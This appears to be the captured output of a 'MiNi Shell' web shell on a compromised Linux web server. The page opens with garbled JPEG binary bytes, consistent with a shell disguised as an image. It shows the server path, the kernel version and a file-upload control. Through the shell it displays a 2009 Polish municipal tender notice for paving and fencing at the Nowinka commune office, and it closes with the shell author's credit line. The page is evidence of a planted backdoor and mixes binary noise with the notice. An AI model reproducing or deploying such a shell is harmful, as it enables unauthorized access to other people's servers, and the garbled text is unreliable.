JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090909/310658-N-2009.html

<p class="kh_header"><b>Nowinka: Utwardzenie nawierzchni placu i przebudowa ogrodzenia posesji wokół siedziby Urzędu Gminy Nowinka</b><br>
<b>Numer ogłoszenia: 310658 - 2009; data zamieszczenia: 09.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Nowinka , 16-304 Nowinka, woj. podlaskie, tel. 087 6419520, 6419541, faks 087 6419660.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utwardzenie nawierzchni placu i przebudowa ogrodzenia posesji wokół siedziby Urzędu Gminy Nowinka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie nawierzchni z betonowej kostki brukowej na podsypce cementowo-piaskowej - 1165 m2 wraz z przygotowaniem podłoża - usunięcie humusu i wykonanie podbudowy z kruszywa łamanego.
2.	Wykonanie trawników dywanowych siewem 0,02 ha
3.	Wykonanie ław i stóp betonowych  15.41 m3
4. Wykonanie ogrodzenia z siatki stalowej ocynkowanej powlekanej PCW śr. drutu po powlekaniu 3,2 mm, wysokość 2,0 m. dł. 145 m, na słupkach stalowych d = 60 x 2 mm osadzonych w indywidualnych stopach betonowych 30x30x140 cm.  Słupki ocynkowane malowane lakierem proszkowym, kolor RAL do uzgodnienia z Zamawiającym .
5. Wykonanie ogrodzenia systemowego z prętów stalowych.                                        Dla celów projektowych przyjęto system Wiśniowski System Lux AW.10.56. www.wisniowski.pl .  Zamawiający dopuszcza zastosowanie systemu ogrodzenia z prętów stalowych innego producenta  - rozwiązanie wariantowe, pod warunkiem utrzymania identycznego efektu wizualnego, rodzaju zastosowanych materiałów i rozwiązań technologicznych. W przypadku zastosowania rozwiązania wariantowego do oferty należy dołączyć karty katalogowe przyjętego systemu łącznie z rysunkami, zdjęciami i tabelę porównawczą głównych parametrów (wysokość przęsła, opis materiałowy - rodzaj stali, wymiary elementów, sposób zabezpieczenia p. korozji i malowania), rozwiązanie konstrukcyjne   bramy przesuwnej włącznie z fundamentami. Łączna długość ogrodzenia 42,8 m w tym 2 szt. bram, jedna przesuwna szer. 5 m i jedna rozwierana dwuskrzydłowa szer. 4,5 m. Bramy w systemie identycznym jak reszta ogrodzenia. Wysokość ogrodzenia od nawierzchni gruntu 2,0 m. Przęsła ogrodzeniowe szerokości 2,5 m i wysokości 1,45 m. montowane na słupkach 60 x 60 mm osadzone na fundamencie betonowym. Elementy metalowe ocynkowane, malowane proszkowo, kolor RAL do uzgodnienia z Zamawiającym. Pomiędzy słupkami cokół wys. 45 cm. dł. 33,5 m z cegły klinkierowej - sachara na fundamencie betonowym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.11.27.10-5, 45.34.20.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> tak.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Spełnią warunki wymienione w art. 22 i nie podlegają wykluczeniu na podstawie art. 24 Ustawy
2. Posiadają ubezpieczenie od odpowiedzialności cywilnej w związku z prowadzoną działalnością gospodarczą
3. Zobowiąże się do udzielenia  gwarancji na roboty budowlane, których dotyczy oferta, na okres minimum 3 lat.
4. Akceptują warunki  SIWZ i załączonego projektu umowy
Ocena spełniania warunków zostanie dokonana metodą spełnia-nie spełnia. Nie spełnienie chociażby jednego z warunków spowoduje wykluczenie oferenta z postępowania a jego oferta zostanie odrzucona..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej,, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2. Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z  dokumentów rejestrowych.
3. Oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego wymienionych w art. 22 Ustawy PZP i nie podleganiu wykluczeniu w związku z art. 24 Ustawy PZP. Wzór oświadczenia- załącznik nr 2
4. W celu potwierdzenia, że oferent posiada niezbędną wiedzę oraz doświadczenie, a także dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (art. 22 pkt 3 Ustawy) składa następujące dokumenty.
4.1 Wykaz wykonanych w okresie ostatnich pięciu lat robót związanych z układaniem nawierzchni z betonowych kostek brukowych  załącznik nr 3, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania. Warunek zostanie uznany za spełniony jeżeli Oferent udokumentuje wykonanie w w/w okresie jednego zadania o wartości netto min. 50 tyś zł.(referencje od zamawiających lub protokoły odbioru)
1.2 Wykaz pracowników załącznik nr 4 przewidywanych do zatrudnienia w trakcie realizacji robót. Wymagane udokumentowanie zatrudnienia, dysponowania jedną osobą z uprawnieniami budowlanymi w zakresie remontów, budowy dróg lub konstrukcji budowlanych.
5. Kopię polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że oferent jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
6 Kalkulacja ceny ofertowej w formie kosztorysu sporządzona na podstawie załączonego przedmiaru robót z uwzględnieniem wytycznych dokumentacji projektowej i STWIORB.
Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej. 
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1       Nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2       Nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
3       Nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umwp-podlasie.pl/bip/gmina/nowinka.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Nowinka  16-304 Nowinka  33.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2009 godzina 10:00, miejsce: Urząd Gminy Nowinka  16-304 Nowinka  33 -sekretariat Wójta.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com